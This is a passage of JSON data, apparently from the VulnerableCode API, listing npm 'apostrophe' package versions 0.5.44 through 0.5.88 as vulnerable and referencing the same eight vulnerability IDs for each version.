lnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.44"},{"url":"http://public2.vulnerablecode.io/api/packages/268133?format=json","purl":"pkg:npm/apostrophe@0.5.45","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.45"},{"url":"http://public2.vulnerablecode.io/api/packages/268134?format=json","purl":"pkg:npm/apostrophe@0.5.46","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.46"},{"url":"http://public2.vulnerablecode.io/api/packages/268135?format=json","purl":"pkg:npm/apostrophe@0.5.47","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.47"},{"url":"http://public2.vulnerablecode.io/api/packages/268136?format=json","purl":"pkg:npm/apostrophe@0.5.48","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.48"},{"url":"http://public2.vulnerablecode.io/api/packages/268137?format=json","purl":"pkg:npm/apostrophe@0.5.49","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.49"},{"url":"http://public2.vulnerablecode.io/api/packages/268138?format=json","purl":"pkg:npm/apostrophe@0.5.50","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.50"},{"url":"http://public2.vulnerablecode.io/api/packages/268139?format=json","purl":"pkg:npm/apostrophe@0.5.51","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.51"},{"url":"http://public2.vulnerablecode.io/api/packages/268140?format=json","purl":"pkg:npm/apostrophe@0.5.52","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.52"},{"url":"http://public2.vulnerablecode.io/api/packages/268141?format=json","purl":"pkg:npm/apostrophe@0.5.53","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.53"},{"url":"http://public2.vulnerablecode.io/api/packages/268142?format=json","purl":"pkg:npm/apostrophe@0.5.54","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.54"},{"url":"http://public2.vulnerablecode.io/api/packages/268143?format=json","purl":"pkg:npm/apostrophe@0.5.55","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.55"},{"url":"http://public2.vulnerablecode.io/api/packages/268144?format=json","purl":"pkg:npm/apostrophe@0.5.56","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.56"},{"url":"http://public2.vulnerablecode.io/api/packages/268145?format=json","purl":"pkg:npm/apostrophe@0.5.57","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.57"},{"url":"http://public2.vulnerablecode.io/api/packages/268146?format=json","purl":"pkg:npm/apostrophe@0.5.58","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.58"},{"url":"http://public2.vulnerablecode.io/api/packages/268147?format=json","purl":"pkg:npm/apostrophe@0.5.59","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.59"},{"url":"http://public2.vulnerablecode.io/api/packages/268148?format=json","purl":"pkg:npm/apostrophe@0.5.60","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.60"},{"url":"http://public2.vulnerablecode.io/api/packages/268149?format=json","purl":"pkg:npm/apostrophe@0.5.61","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.61"},{"url":"http://public2.vulnerablecode.io/api/packages/268150?format=json","purl":"pkg:npm/apostrophe@0.5.62","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.62"},{"url":"http://public2.vulnerablecode.io/api/packages/268151?format=json","purl":"pkg:npm/apostrophe@0.5.63","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.63"},{"url":"http://public2.vulnerablecode.io/api/packages/268152?format=json","purl":"pkg:npm/apostrophe@0.5.64","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.64"},{"url":"http://public2.vulnerablecode.io/api/packages/268153?format=json","purl":"pkg:npm/apostrophe@0.5.65","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.65"},{"url":"http://public2.vulnerablecode.io/api/packages/268154?format=json","purl":"pkg:npm/apostrophe@0.5.66","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.66"},{"url":"http://public2.vulnerablecode.io/api/packages/268155?format=json","purl":"pkg:npm/apostrophe@0.5.67","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.67"},{"url":"http://public2.vulnerablecode.io/api/packages/268156?format=json","purl":"pkg:npm/apostrophe@0.5.69","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.69"},{"url":"http://public2.vulnerablecode.io/api/packages/268157?format=json","purl":"pkg:npm/apostrophe@0.5.70","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.70"},{"url":"http://public2.vulnerablecode.io/api/packages/268158?format=json","purl":"pkg:npm/apostrophe@0.5.71","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.71"},{"url":"http://public2.vulnerablecode.io/api/packages/268159?format=json","purl":"pkg:npm/apostrophe@0.5.72","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.72"},{"url":"http://public2.vulnerablecode.io/api/packages/268160?format=json","purl":"pkg:npm/apostrophe@0.5.73","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.73"},{"url":"http://public2.vulnerablecode.io/api/packages/268161?format=json","purl":"pkg:npm/apostrophe@0.5.74","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.74"},{"url":"http://public2.vulnerablecode.io/api/packages/268162?format=json","purl":"pkg:npm/apostrophe@0.5.75","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.75"},{"url":"http://public2.vulnerablecode.io/api/packages/268163?format=json","purl":"pkg:npm/apostrophe@0.5.76","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.76"},{"url":"http://public2.vulnerablecode.io/api/packages/268164?format=json","purl":"pkg:npm/apostrophe@0.5.77","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.77"},{"url":"http://public2.vulnerablecode.io/api/packages/268165?format=json","purl":"pkg:npm/apostrophe@0.5.78","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.78"},{"url":"http://public2.vulnerablecode.io/api/packages/268166?format=json","purl":"pkg:npm/apostrophe@0.5.79","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.79"},{"url":"http://public2.vulnerablecode.io/api/packages/268167?format=json","purl":"pkg:npm/apostrophe@0.5.80","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.80"},{"url":"http://public2.vulnerablecode.io/api/packages/268168?format=json","purl":"pkg:npm/apostrophe@0.5.81","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.81"},{"url":"http://public2.vulnerablecode.io/api/packages/268169?format=json","purl":"pkg:npm/apostrophe@0.5.82","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.82"},{"url":"http://public2.vulnerablecode.io/api/packages/268170?format=json","purl":"pkg:npm/apostrophe@0.5.83","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.83"},{"url":"http://public2.vulnerablecode.io/api/packages/268171?format=json","purl":"pkg:npm/apostrophe@0.5.84","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.84"},{"url":"http://public2.vulnerablecode.io/api/packages/268172?format=json","purl":"pkg:npm/apostrophe@0.5.85","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.85"},{"url":"http://public2.vulnerablecode.io/api/packages/268173?format=json","purl":"pkg:npm/apostrophe@0.5.86","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.86"},{"url":"http://public2.vulnerablecode.io/api/packages/268174?format=json","purl":"pkg:npm/apostrophe@0.5.87","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.5.87"},{"url":"http://public2.vulnerablecode.io/api/packages/268175?format=json","purl":"pkg:npm/apostrophe@0.5.88","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-t